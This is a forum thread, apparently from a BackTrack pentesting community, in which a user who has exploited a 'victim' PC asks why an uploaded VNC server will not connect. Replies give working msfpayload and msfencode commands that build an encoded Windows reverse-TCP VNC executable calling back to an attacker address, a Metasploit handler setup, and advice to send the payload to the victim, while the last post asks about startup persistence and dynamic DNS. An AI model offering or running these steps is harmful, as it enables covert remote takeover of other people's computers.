Results 1 to 6 of 6

Thread: Problem With Exec VNC on Victim Comp

  1. #1
    Just burned his ISO
    Join Date
    Jun 2009
    Posts
    22

    Default Problem With Exec VNC on Victim Comp

    Hey guys,

    This is my first post! As many...i've been lurking around this forum for months and months soaking in all the information.

    My question:

    I've managed to exploit my victim pc and gained my reverse shell. I drop myself a nc and go on home for the day. The next day I login via my nc - another shell great. I go ahead and compile myself a nice ultravnc server and toss it onto the victim remotely. I transfer the winvnc.exe and ultravnc.ini(think thats the name) file for the settings. I type "start winvnc.exe" and check - yes its running.

    Now back on bt3 i run wine vncviewer.exe I type the Ip - seems to connect. Then prompt for password...sounds good. Enter my password ...and then bam! connection closed.(note it does not state incorrect password)

    I tried to connect via windows vncviewer - take me all the way to password, accepts password and then i get a socket write error. I have googled this, but have not come to a distinct answer. Im using the latest ultravnc release.

    PS
    1. I have also tried a realvnc server to upload - still problems connecting.
    2. Im running BT3 on a VM on same computer as my victim.
    3. If i load the same vnc server manually via flashdrive onto a victim comp and try to connect via wine vncviewer on BT3 it works fine.
    4. I have already watched purehates video.

    Thanks in advance!

  2. #2
    Senior Member BigMac's Avatar
    Join Date
    Jan 2008
    Posts
    213

    Default

    i would use msfpayload...

    ./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.5 LPORT=999 X -o reverse_vnc.exe

    that will generate a win32 executable payload located in this directory /pentest/exploit/framework3/

    before you send this to your victim you need to start a multi handler... start metasploit then use these commands...

    use exploit/multi/handler
    set PAYLOAD windows/vncinject/reverse_tcp
    set LHOST 192.168.1.5
    set LPORT 999

    Note: lhost and lport must be the same in both the executable and the multi handler... lhost is the ip address of the attacking computer(backtrack)...

    now that you have the multi handler set up to listen for incoming connections all you need to do now is send the payload to the victim to execute...

  3. #3
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Quote Originally Posted by BigMac View Post
    i would use msfpayload...

    ./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.5 LPORT=999 X -o reverse_vnc.exe
    I got an error msg:
    bt framework3 # ./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.4 LPORT=999 X -o reverse_vnc.exe
    Error generating payload: The argument could not be parsed correctly.
    This one worked for me:
    bt framework3 # ./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.4 LPORT=999 R | ./msfencode -b '' -t exe -o reverse_vnc.exe
    [*] x86/shikata_ga_nai succeeded with size 306 (iteration=1)
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

  4. #4
    Senior Member BigMac's Avatar
    Join Date
    Jan 2008
    Posts
    213

    Default

    my syntax is wrong... im lazy... sorry... you can search the forum for msfpayload, i have made lots of post on the subject...

  5. #5
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    The intension was not to find error in your command, I was wondering that may be I was missing something. I thought that may be it's possible to do the same job with shorter command (as your one).. anyway, it's sorted. Thanks for the approach.
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

  6. #6
    coool
    Guest

    Default

    Code:
    ./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.5 LPORT=999 X -o reverse_vnc.exe
    that command not work , why use X -o understand ? test with command

    ./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.5 LPORT=999 V > /tmp/reverse_vnc.exe
    don't forgot use DisableCourtesyShell=True if you want Disable this
    http://img140.imageshack.us/img140/8664/vnc.png
    I don't know if can modify code add some thing like enable trans file VNC and put auto to Startup windows and if can use no-ip without real ip I hop if can because some time disconnection internet but if use no-ip is very nice

    any on have some info about that tell me !

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •